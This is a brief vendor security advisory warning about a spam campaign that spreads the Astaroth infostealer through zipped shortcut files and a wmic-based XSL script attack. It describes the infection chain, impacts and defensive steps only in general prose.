LTS Secure Warning: New Mal-Spam Campaign Identified Delivering Infostealer.Astaroth With Advanced Evasion Techniques

A new version of the Astaroth malware has surfaced again & is making use of native microsoft tools to evade common security solutions. Attackers are making use of Mal-Spam campaigns to target mostly users in Brazil & European countries.

Technical Details

The trojan makes it way on the compromised computer via .zip file contained in spam email. Once the .zip is downloaded & extracted, it presents an .lnk file, that upon pressing start the infection process. The process makes use of wmic.exe to initialize a XSL script processing attack. This allows the malware to communicate with a remote C&C server & send sensitive/personal information from the infected machine to attacker.

The XSL file additional consists of highly obfuscated code that has the ability to execute further malicious activity & assists the malware from being hidden from anti-viruses.

Impact

• Logs user’s keystrokes.
• Prevents operating system calls.
• Gather information saved to the clipboard.
• Steal sensitive/confidential information like login credentials of banking sites, cookies, etc.

Recommended Actions

• Never download any suspicious attachments or click on any shady-looking link.
• Take an effort to educate your users on how to identify a mail-spam.
• Try to avoid downloading and using any Freeware application.
• Always update your anti-virus software with the latest releases.
• Run a periodic Full system scan.